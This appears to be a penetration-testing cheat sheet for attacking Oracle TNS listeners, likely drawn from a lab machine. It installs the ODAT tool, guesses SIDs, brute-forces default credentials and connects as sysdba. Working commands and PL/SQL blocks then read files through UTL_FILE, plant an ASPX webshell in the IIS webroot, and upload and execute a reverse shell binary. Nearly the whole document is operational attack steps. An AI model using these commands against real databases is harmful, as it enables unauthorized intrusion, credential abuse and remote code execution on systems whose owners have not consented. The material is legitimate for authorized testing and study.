Oracle TNS Listener

Reference

Setting up ODAT

# Build ODAT from source and install the Oracle Instant Client packages it depends on.
git clone https://github.com/quentinhardy/odat.git
cd odat/
# Pull in the git submodules ODAT vendors.
git submodule init
git submodule update
# Build/runtime dependencies (libaio is needed by the Oracle client libraries).
sudo apt-get install libaio1 python3-dev alien python3-pip
# Convert the Oracle Instant Client RPMs in the current directory to .deb and install them.
# NOTE(review): no command on this page fetches the RPMs — presumably they were downloaded
# into odat/ beforehand; verify their origin and checksum before installing them.
sudo alien --to-deb *.rpm
sudo dpkg -i *.deb

# Add the following exports to /etc/profile so the Oracle client is found in every session.
# ORACLE_HOME must point at the versioned client directory: `ls /usr/lib/oracle` shows two
# directories — use the 19.x one (the 19.6 below is an example; adjust to what is installed).
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/  
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
# The trailing slash on ORACLE_HOME is relied on here (${ORACLE_HOME}bin, no separator added).
export PATH=${ORACLE_HOME}bin:$PATH

# Python dependencies for ODAT.
pip install cx_Oracle
# NOTE(review): pycryptodome is pinned to an old release (3.4.3); confirm the pin is intentional
# and that it still installs on the current interpreter before reusing this setup.
pip install pycryptodome==3.4.3
pip install passlib
pip install python-libnmap

Enumeration

# Enumerate SIDs (Oracle System ID: the string that uniquely identifies a database on a host).
# ODAT guesses SIDs against the listener port; the Metasploit module on the next line does the same.
python3 odat.py sidguesser -s <IP> -p 1521
# Metasploit console command, not a shell command.
use auxiliary/scanner/oracle/sid_brute

# Check whether the listener is affected by TNS listener poisoning (Metasploit console command).
use auxiliary/scanner/oracle/tnspoison_checker

# Identify valid accounts with ODAT using the default-credential wordlist.
# Wordlist: /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt
cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt ./accounts/accounts.txt
# ODAT expects one <user>/<pass> per line; the wordlist is presumably space-separated.
# The substitution below is a vim ex command (run it inside vim on accounts.txt), not sed syntax;
# the sed equivalent uses the same pattern: sed -i 's/ /\//g' accounts.txt
%s/ /\//g

python3 odat.py passwordguesser -s <IP> -d <SID>

## Connect to the database with the recovered credentials via SQL*Plus.
sqlplus64 scott/tiger@10.10.10.82/<SID> as sysdba

# List the privileges active in the current session (run inside SQL*Plus).
select * from session_privs;

# List the roles granted to the current user (run inside SQL*Plus).
select * from user_role_privs;

Exploitation

  • Requires Valid Credentials

Check Read Access

  • When entering a PL/SQL block in the sqlplus session, type `/` on its own line to execute it.

# Connect as SYSDBA to the XE instance with the recovered credentials.
sqlplus64 scott/tiger@10.10.10.82/XE as sysdba
# SQL*Plus setting: without it, DBMS_OUTPUT.PUT_LINE output from the block below is not shown.
set serveroutput ON

#Run the PL/SQL block below. Type `/` on its own line to execute it.
-- Anonymous PL/SQL block: read the first line of a file on the database host through UTL_FILE
-- and echo it with DBMS_OUTPUT (needs `set serveroutput on` in the SQL*Plus session).
-- NOTE(review): UTL_FILE.FOPEN's first argument is a directory location; on current releases
-- this is normally a DIRECTORY object name rather than a raw path, so whether the literal path
-- below is accepted depends on the server's UTL_FILE_DIR / directory-object configuration.
declare
    f utl_file.file_type;
    s varchar(200);   -- get_line raises VALUE_ERROR if the line does not fit in this buffer
begin
    f :=utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm','R');   -- 'R' = read mode
    utl_file.get_line(f,s);   -- reads a single line only
    utl_file.fclose(f);       -- skipped if get_line raises; the handle is then not closed
    dbms_output.put_line(s);
end;

Webshell

  • Web shell runs with IIS service privileges.

  • Upload webshell to webroot and access via web server.

# Automate the upload with ODAT's dbmsxslprocessor module.
# Prepare the ASPX reverse shell and its listener first; the module writes the local file to the
# given directory on the target (the trailing backslash is doubled so the shell keeps it).
python odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot\\" <name-on-target>.aspx <path-to-shell-local> --sysdba

-----------
# Manual webshell upload. Strip extra lines/comments from the shell source; the line count
# needs to stay below 1000 for Oracle to execute it.
cp /usr/share/webshells/aspx/cmdasp.aspx shell.aspx
# Joins all lines into one. Without -i, sed prints the result to stdout and leaves shell.aspx unchanged.
sed -z 's/\n//g' shell.aspx

#Save the PL/SQL block below, then run it from the sqlplus session.
-- Anonymous PL/SQL block: write the contents of `s` as one line into a file under the web root
-- through UTL_FILE ('W' = write mode; an existing file of that name is presumably overwritten).
-- NOTE(review): as in the read example, the directory argument must be resolvable by the
-- server's UTL_FILE configuration; the file is created under the Oracle service account, which
-- is why UTL_FILE usage and directory-object grants are worth auditing on the database side.
declare
    f utl_file.file_type;
    s varchar(5000) := '<Replace with .aspx webshell code>';   -- PL/SQL literal; must fit the declared size
begin
    f :=utl_file.fopen('/inetpub/wwwroot', 'cmd.aspx','W');
    utl_file.put_line(f,s);   -- writes the string followed by a line terminator
    utl_file.fclose(f);       -- skipped if put_line raises; the handle is then not closed
end;

Reverse Shell

  • May be unstable

  • Runs with Oracle service privileges

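# Prepare the reverse shell binary and its listener first.
# Upload the local file to <Target-location> on the target with ODAT's utlfile module ...
python odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /<Target-location> <uploadedshell.exe> <path-to-shell-local> --sysdba
# ... then execute it through ODAT's externaltable module (runs with Oracle service privileges).
./odat.py externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec </temp: Target-location> <uploadedshell.exe>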
----------------------------

#Manual upload

-- Anonymous PL/SQL block: write the string in `s` as one line into a new file under the web root
-- through UTL_FILE ('W' = write mode). Same UTL_FILE directory caveat as the earlier blocks.
-- NOTE(review): put_line is a text write of a PL/SQL string literal; what ends up on disk is the
-- literal text plus a line terminator, created under the Oracle service account.
declare
    f utl_file.file_type;
    s varchar(5000) := '<Replace with shellcode>';   -- PL/SQL literal; must fit the declared size
begin
    f :=utl_file.fopen('/inetpub/wwwroot', 'revshell.exe','W');
    utl_file.put_line(f,s);   -- writes the string followed by a line terminator
    utl_file.fclose(f);       -- skipped if put_line raises; the handle is then not closed
end;
